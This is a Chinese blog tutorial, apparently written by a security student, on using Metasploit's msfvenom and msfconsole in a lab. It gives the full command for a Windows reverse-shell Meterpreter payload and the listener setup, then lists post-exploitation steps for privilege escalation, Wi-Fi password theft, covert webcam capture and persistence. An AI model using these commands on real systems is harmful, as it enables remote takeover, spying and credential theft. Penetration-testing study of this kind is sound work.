Metasploit framework, msf,Msfvenom,详细学习实验使用

最新推荐文章于 2024-07-17 21:40:42 发布
最新推荐文章于 2024-07-17 21:40:42 发布
阅读量403 收藏 11
点赞数 5
分类专栏: 网络安全 渗透学习之路 文章标签: 学习 网络安全 爬虫 wireshark
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73960954/article/details/137892130
版权
本文详细介绍了如何在KaliLinux中使用MetasploitFramework进行渗透测试,包括生成木马、免杀处理、设置payload、监听连接以及执行各种攻击操作,如文件上传下载、提权、获取Wi-Fi密码、监控屏幕等。
摘要由CSDN通过智能技术生成

打开kali,点击左上角的Metasploit framework,然后有用来个点赞与收藏!!

利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听

利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等

MSF攻击载荷模块 - payloads

MSF攻击步骤:

Msfvenom生成Payload→msfconsole开启监听→运行Payload →获得控制

Msfvenom 生成 Windows 可执行程序实例:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.239.130 lport=5656 -f exe -o cf.exe

-p windows/meterpreter/reverse_tcp:指定payload类型为windows 系统下运行的反向TCP连接的meterpreter

lhost=192.168.239.130:指定payload反向连接的IP地址

lport=5656:指定payload反向连接的端口号

-f exe:生成exe格式的payload

-o cf.exe:保存payload为cf.exe文件名

如下图所示

MSF攻击载荷模块 - payloads

MSF攻击步骤:

Msfvenom生成Payload→msfconsole开启监听→运行Payload →获得控制

Msfconsole 开启监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.239.130
set lport  5656
run

效果如图所示,此时获得靶机控制器

后渗透命令自己后面找一下其他blog,以下是以下简单的

上传、下载、

download C:\\1.txt 1.txt  #下载文件

upload /var/www/wce.exe wce.exe  #上传文件

提权 getsystem

获取Wifi密码 run post/windows/wlan/wlan_profile

拍照screenshot截屏

电脑前置摄像头拍照Webcam_snap(已剪辑过)

监控屏幕webcam——stream

相当于直播

进程迁移、保持永久

 run exploit/windows/local/persistence

run exploit/windows/local/persistence lhost 192.168.239.130

免杀过360参考other blogs 

sf81
关注
  • 5
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用Metasploit安全测试工具在渗透测试中可以做很多事情,你可以保存你的日志、甚至定义每个有效负载在运行完成之后是如何将其自身清除的。值得一提的是这个强大的工具是免费的,它的开发团队由两个全职成员和少数兼职的投稿者组成,Metasploit Framework由最初的1.0版发展到现在的3.0版的漏洞自动化探测,成绩骄人,精神可嘉!
metasploit-framework-6.3.34.zip
09-17
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会包含最新的功能、修复和性能改进。在网络安全领域,...
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3343
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenommsfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
网络攻防作业——Msfvenom使用
yyy7654321的博客
06-28 2560
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
【渗透测试框架】Metasploit-Framework(MSF)安装与使用
做自己喜欢的事,并将其发挥到极致!
05-23 7088
文章目录前言一、Metasploit简介二、Metasploit安装及更新一键安装更新Metasploit三、Metasploit数据库连接四、Metasploit模块介绍Exploit模块Payload模块常见的几种 Stagers PayloadMeterpreter五、Metasploit实战攻击六、后渗透攻击阶段后渗透常用命令POST后渗透常用模块生成持续性后门程序Metasploit Socks代理PowerShell脚本(域内信息收集)加载stdapi升级会话SessionMeterpreter
Metasploit Framework —— Msfvenom
KAKA的博客
07-09 400
身份证 msfvenommsfpayload 爸爸和 msfencode 妈妈生的仔仔,是两个的结合体,继承了两者的优良品德,生日是 2015 年 6 月 8 日,刚过不久… 用武之地 免杀 : msfvenom 结合 excellent 编码器等生成的 payload 具有一定的免杀效果 客户端渗透 : 在无法突破网络边界的情况下(IDS等)转而进行客户端的渗透,此法常见于社会工程学攻击,进而渗透到线上的业务网络,具体较常见的形式有:图片 邮件 PDF DOC WEB站点…诱骗人家下载执行 payl
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
MASTERING_METASPLOIT_THIRD_EDITION_metasploitframework_
10-02
通过学习《Mastering Metasploit Framework》第三版,读者不仅能掌握Metasploit使用技巧,还能加深对网络安全攻防的理解,提升安全防护能力。书中的PDF文件包含了详细的章节和实例,是深入学习Metasploit的宝贵...
昇思25天学习打卡营第14天|LLM-文本解码原理--以MindNLP为例
最新发布
wwt72的博客
07-17 459
限制输出序列的最大长度为50个token。top-p=0.95,top-p采样表示在每一步生成token时,只从概率分布中累计概率达到95%的token中进行采样,有助于保持生成文本的流畅性和质量,同时允许一些低概率的token被选中,从而增加多样性。表示禁用了top-k采样,因为在top-k采样中,通常是从概率最高的k个token中随机选择一个token作为下一个输出,而这里设置为0表示不限制token的选择,实际上这将等同于使用 softmax 概率分布直接进行采样。这有助于提高生成文本的多样性。
卷积神经网络学习问题总结
weixin_61681867的博客
07-17 256
均方误差函数(MSE)适用于回归任务,如预测房价、预测股票价格等。
探索Perl语言:入门学习与实战指南
洛秋的博客
07-15 755
Perl(Practical Extraction and Report Language)由Larry Wall于1987年创建,旨在帮助系统管理员简化日常任务。高效灵活:Perl的语法灵活多样,支持多种编程风格(过程式、面向对象等)。强大的文本处理能力:内置强大的正则表达式支持,是处理文本数据的利器。丰富的模块库:通过CPAN(Comprehensive Perl Archive Network)可以方便地获取和使用各类模块。Perl广泛应用于系统管理、Web开发、网络编程、数据库操作等领域。
NumPy库学习之np.random.rand函数
qq_46396470的博客
07-15 199
是 NumPy 库中的一个函数,用于生成随机数。这些随机数是从均匀分布 [0, 1) 中抽取的,即每个数都在0到1之间,但不包括1。
钓鱼攻击 - 基础学习
Reset
07-16 445
钓鱼攻击是一种典型的欺诈式攻击手段,攻击者通过伪装成可以信任的角色,利用电子邮件或其他通信渠道向被攻击者发送植入了木马的文档或恶意链接,并诱骗被攻击者点击执行,从而实现对被攻击者计算机的远程控制或恶意程序感染。
python 语法学习 day 7
2303_79973545的博客
07-15 274
-----元组之间可以进行比较,比较的规则是逐个比较元组中的元素。首先比较第一个元素,如果相等,则比较第二个元素,以此类推。如果所有元素都相等,那么元组相等;否则,比较的结果取决于第一个不相等元素的比较结果。题意:统计单词的种类以及数量(忽略大小写),最终以降序输出(出现次数相同的单词根据单词的大小升序输出)-------掌握如何将一个英语句子中的单词拆出来,并且去掉标点符号。EOF,输入后产生异常-->>捕获异常,结束输入。第一次提交的答案是:先把所有输入值放在列表里面。------字典排序。
昇思MindSpore 25天学习打卡营|day20
weixin_42036358的博客
07-13 730
生成式对抗网络(Generative Adversarial Networks,GAN)是一种生成式机器学习模型,是近年来复杂分布上无监督学习最具前景的方法之一。最初,GAN由Ian J. Goodfellow于2014年发明,并在论文生成器的任务是生成看起来像训练图像的“假”图像;判别器需要判断从生成器输出的图像是真实的训练图像还是虚假的图像。GAN通过设计生成模型和判别模型这两个模块,使其互相博弈学习产生了相当好的输出。GAN模型的核心在于提出了通过对抗过程来估计生成模型这一全新框架。
Cadence23学习笔记(三)
zjb6668的博客
07-15 340
焊接FPC的时候先上锡,焊台加热后再图上焊油,再放置元器件,再加热:万用表测电流只需要把表笔接到电流的孔位即可测量电流,不需要接再串联一个负载:有些线性电源两个通道可以串联,并联起来使用
kali怎么安装msfvenom
06-14
Kali Linux是一个著名的渗透测试操作系统,Metasploit Framework (MSF) 是其中的一个核心组件,而 Metasploit venom 是MSF中的一个模块,用于生成和修改可执行文件以利用特定漏洞。以下是安装MSFVenom的基本步骤: 1. **确保已安装Metasploit Framework**:首先,你需要确保Kali上已经安装了Metasploit Framework。你可以通过终端打开Kali,输入命令 `sudo apt-get update` 更新包列表,然后 `sudo apt-get install metasploit-framework` 安装。 2. **更新Metasploit**: 安装完成后,执行 `update-msf` 来确保Metasploit模块是最新的。 3. **安装MSFVenom**:由于MSFVenom通常作为Metasploit Framework的一部分发布,所以如果你已经安装了Metasploit,理论上MSFVenom也应该已经存在。但为了确认,你可以直接用 `which msfvenom` 检查路径。如果没有找到,可以尝试运行 `sudo gem install metasploit-venom` 进行安装。 4. **验证安装**:安装后,你可以在终端中输入 `msfvenom -h` 或者 `msfvenom --help` 来检查是否可以显示MSFVenom使用帮助,如果能看到帮助信息,则说明安装成功。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值